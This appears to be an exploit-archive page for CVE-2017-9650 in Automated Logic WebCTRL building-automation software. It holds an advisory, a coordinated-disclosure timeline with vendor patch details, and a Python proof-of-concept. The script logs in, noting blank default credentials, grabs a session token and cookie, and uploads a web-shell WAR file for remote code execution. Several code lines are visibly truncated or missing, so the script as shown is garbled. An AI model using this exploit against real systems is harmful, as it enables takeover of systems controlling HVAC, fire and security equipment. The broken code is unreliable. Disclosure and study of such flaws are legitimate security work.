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HistoryNov 13, 2017 - 12:00 a.m.

Automated Logic WebCTRL 6.5 Unrestricted File Upload Remote Code Execution


0.001 Low





WebCTRL suffers from an authenticated arbitrary code execution vulnerability. The issue is caused due to the improper verification when uploading Add-on (.addons or .war) files using the uploadwarfile servlet. This can be exploited to execute arbitrary code by uploading a malicious web archive file that will run automatically and can be accessed from within the webroot directory. Additionaly, an improper authorization access control occurs when using the ‘anonymous’ user. By specification, the anonymous user should not have permissions or authorization to upload or install add-ons. In this case, when using the anonymous user, an attacker is still able to upload a malicious file via insecure direct object reference and execute arbitrary code. The anonymous user was removed from version 6.5 of WebCTRL.


Automated Logic Corporation -

Affected Version

  • ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior
  • ALC WebCTRL, SiteScan Web 6.1 and prior
  • ALC WebCTRL, i-Vu 6.0 and prior
  • ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
  • ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior
  • Note: Current supported versions are 6.5, 6.1 and 6.0

Tested On

Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601)


Apache Tomcat/7.0.42



Java HotSpot Server VM 23.25-b01

Ant 1.7.0

Axis 1.4

Trove 2.0.2

Xalan Java 2.4.1

Xerces-J 2.6.1

Vendor Status

  • [30.01.2017] Vulnerability discovered.

  • [27.03.2017] Vendor contacted.

  • [13.04.2017] No response from the vendor.

  • [14.04.2017] ICS-CERT contacted.

  • [17.04.2017] ICS-CERT asks details to coordinate with the vendor.

  • [20.04.2017] Sent details to ICS-CERT.

  • [21.04.2017] ICS-CERT assigned ticket ID: ICS-VU-696479 to this issue.

  • [19.05.2017] ICS-CERT informs that the vendor has validated the issues and begun working on patch.

  • [07.06.2017] Asked ICS-CERT for status update.

  • [26.06.2017] ICS-CERT responded with vendor info: Vendor has created patch for 6.5 and currently working on patch for 6.1 and 6.0. Patch is available through their tech support organization as an individual patch.

  • [04.07.2017] Replied to ICS-CERT.

  • [31.07.2017] ICS-CERT informs that vendor is testing all patches and will shortly communicate to its dealers and installers. Developing an advisory for review and waiting for vendor on specific version details.

  • [31.07.2017] Replied to ICS-CERT.

  • [31.07.2017] ICS-CERT provides ZSL a draft advisory for review.

  • [01.08.2017] Replied to ICS-CERT.

  • [04.08.2017] Vendor has contacted ZSL with a request for more time.

  • [04.08.2017] Replied to the vendor and to ICS-CERT with new advisory release date proposal.

  • [04.08.2017] Vendor contacts ZSL for further discussions and planning.

  • [04.08.2017] Working with the vendor.

  • [11.08.2017] Vendor provides update, scheduling official release date to be 22nd of August.

  • [18.08.2017] Vendor provides mitigation details:
    ALC applications should always be installed and maintained in accordance with the guidelines found here:
    In addition ALC has released the following patches:
    WebCTRL 6.0, Cumulative Patch #13
    WebCTRL 6.1, Cumulative Patch #7
    WebCTRL 6.5, Cumulative Patch #7 + WS65_Security_Update2.update
    These patch releases may be obtained on the Automated Logic accounts website or calling Technical Support at 770-429-3002
    i-Vu 6.0, Cumulative Patch #13
    i-Vu 6.5, Cumulative Patch #7 + WS65_Security_Update2.update
    The patch release may be obtained by calling Technical Support at 800-277-9852
    SiteScan Web Version 6.1, Cumulative Patch #7, and
    SiteScan Web Version 6.5, Cumulative Patch #7 + WS65_Security_Update2.update.
    These patches may be obtained by contacting Liebert Services at 1-800-543-2378.
    End users should contact their Carrier Controls Expert for i-Vu patches for support on installing the patches.

  • [22.08.2017] Coordinated public security advisory released.

                                                #!/usr/bin/env python
# -*- coding: utf8 -*-
# Automated Logic WebCTRL 6.5 Unrestricted File Upload Remote Code Execution
# Vendor: Automated Logic Corporation
# Product web page:
# Affected version: ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior
#                   ALC WebCTRL, SiteScan Web 6.1 and prior
#                   ALC WebCTRL, i-Vu 6.0 and prior
#                   ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
#                   ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior
# Summary: WebCTRLВ®, Automated Logic's web-based building automation
# system, is known for its intuitive user interface and powerful integration
# capabilities. It allows building operators to optimize and manage
# all of their building systems - including HVAC, lighting, fire, elevators,
# and security - all within a single HVAC controls platform. It's everything
# they need to keep occupants comfortable, manage energy conservation measures,
# identify key operational problems, and validate the results.
# Desc: WebCTRL suffers from an authenticated arbitrary code execution
# vulnerability. The issue is caused due to the improper verification
# when uploading Add-on (.addons or .war) files using the uploadwarfile
# servlet. This can be exploited to execute arbitrary code by uploading
# a malicious web archive file that will run automatically and can be
# accessed from within the webroot directory. Additionaly, an improper
# authorization access control occurs when using the 'anonymous' user.
# By specification, the anonymous user should not have permissions or
# authorization to upload or install add-ons. In this case, when using
# the anonymous user, an attacker is still able to upload a malicious
# file via insecure direct object reference and execute arbitrary code.
# The anonymous user was removed from version 6.5 of WebCTRL.
# Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601)
#            Apache-Coyote/1.1
#            Apache Tomcat/7.0.42
#            CJServer/1.1
#            Java/1.7.0_25-b17
#            Java HotSpot Server VM 23.25-b01
#            Ant 1.7.0
#            Axis 1.4
#            Trove 2.0.2
#            Xalan Java 2.4.1
#            Xerces-J 2.6.1
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
# Advisory ID: ZSL-2017-5431
# Advisory URL:
# CVE ID: CVE-2017-9650
# 30.01.2017

import itertools
import mimetools
import mimetypes
import cookielib
import binascii
import urllib2
import urllib
import sys
import re
import os

from urllib2 import URLError
global bindata

__author__ = 'lqwrm'

piton = os.path.basename(sys.argv[0])

def bannerche():
  print '''
 |                                                 |
 |        WebCTRL 6.5 Authenticated RCE PoC        |
 |               ID: ZSL-2017-5431                 |
 |       Copyleft (c) 2017, Zero Science Lab       |
 |                                                 |
  if len(sys.argv) < 3:
    print '[+] Usage: '+piton+' <IP> <WAR FILE>'
    print '[+] Example: '+piton+' webshell.war\n'


host = sys.argv[1]
filename = sys.argv[2]

with open(filename, 'rb') as f:
    content =
hexo = binascii.hexlify(content)
bindata = binascii.unhexlify(hexo)

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

print '[+] Probing target http://'+host

  checkhost ='http://'+host+'/index.jsp?operatorlocale=en')
except urllib2.HTTPError, errorzio:
  if errorzio.code == 404:
    print '[!] Error 001:'
    print '[-] Check your target!'
except URLError, errorziocvaj:
  if errorziocvaj.reason:
    print '[!] Error 002:'
    print '[-] Check your target!'

print '[+] Target seems OK.'
print '[+] Login please:'

print '''
Default username: Administrator, Anonymous
Default password: (blank), (blank)

username = raw_input('[*] Enter username: ')
password = raw_input('[*] Enter password: ')

login_data = urllib.urlencode({'pass':password, 'name':username, 'touchscr':'false'})

opener.addheaders = [('User-agent', 'Thrizilla/33.9')]
login ='http://'+host+'/?language=en', login_data)
auth =

if'productName = \'WebCTRL', auth):
  print '[+] Authenticated!'
  token ='wbs=(.+?)&', auth).group(1)
  print '[+] Got wbs token: '+token
  cookie1, cookie2 = [str(c) for c in cj]
  cookie = cookie1[8:51]
  print '[+] Got cookie: '+cookie
  print '[-] Incorrect username or password.'

print '[+] Sending payload.'

class MultiPartForm(object):

    def __init__(self):
        self.form_fields = []
        self.files = []
        self.boundary = mimetools.choose_boundary()
    def get_content_type(self):
        return 'multipart/form-data; boundary=%s' % self.boundary

    def add_field(self, name, value):
        self.form_fields.append((name, value))

    def add_file(self, fieldname, filename, fileHandle, mimetype=None):
        body =
        if mimetype is None:
            mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
        self.files.append((fieldname, filename, mimetype, body))
    def __str__(self):

        parts = []
        part_boundary = '--' + self.boundary
            [ part_boundary,
              'Content-Disposition: form-data; name="%s"' % name,
            for name, value in self.form_fields
            [ part_boundary,
              'Content-Disposition: file; name="%s"; filename="%s"' % \
                 (field_name, filename),
              'Content-Type: %s' % content_type,
            for field_name, filename, content_type, body in self.files
        flattened = list(itertools.chain(*parts))
        flattened.append('--' + self.boundary + '--')
        return '\r\n'.join(flattened)

if __name__ == '__main__':
    form = MultiPartForm()
    form.add_field('wbs', token)
    form.add_field('file"; filename="'+filename, bindata)
    request = urllib2.Request('http://'+host+'/_common/servlet/lvl5/uploadwarfile')
    request.add_header('User-agent', 'SCADA/8.0')
    body = str(form)
    request.add_header('Content-type', form.get_content_type())
    request.add_header('Cookie', cookie)
    request.add_header('Content-length', len(body))

print '[+] Payload uploaded.'
print '[+] Shell available at: http://'+host+'/'+filename[:-4]
